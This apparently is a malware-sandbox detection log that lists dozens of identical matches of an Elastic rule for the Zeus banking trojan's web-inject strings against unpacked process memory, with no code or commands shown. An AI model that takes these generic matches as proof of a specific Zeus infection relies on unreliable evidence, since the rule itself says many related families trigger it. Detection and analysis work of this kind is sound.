    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2ab0000.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.36.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 9.2.tGYLgZxMWmmBTD.exe.27c2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 5.2.tGYLgZxMWmmBTD.exe.8d0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.4190000.9.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.34.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.40.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.27.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.2d60000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.46.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.43.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.45.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2a02000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.24.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.16.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 24.2.tGYLgZxMWmmBTD.exe.9d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.11.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.29.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.38.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.883000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.2bb0000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.arxtPs1STE.exe.406400.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 17.2.tGYLgZxMWmmBTD.exe.e12000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 20.2.tGYLgZxMWmmBTD.exe.2172000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.12.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.2.svchost.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 6.2.tGYLgZxMWmmBTD.exe.822000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.tGYLgZxMWmmBTD.exe.d72000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.tGYLgZxMWmmBTD.exe.29b2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 26.2.tGYLgZxMWmmBTD.exe.1340000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.24.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 34.2.tGYLgZxMWmmBTD.exe.2742000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.3f90000.18.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 2.3.svchost.exe.2c70000.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.tGYLgZxMWmmBTD.exe.dd0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 22.2.tGYLgZxMWmmBTD.exe.1222000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
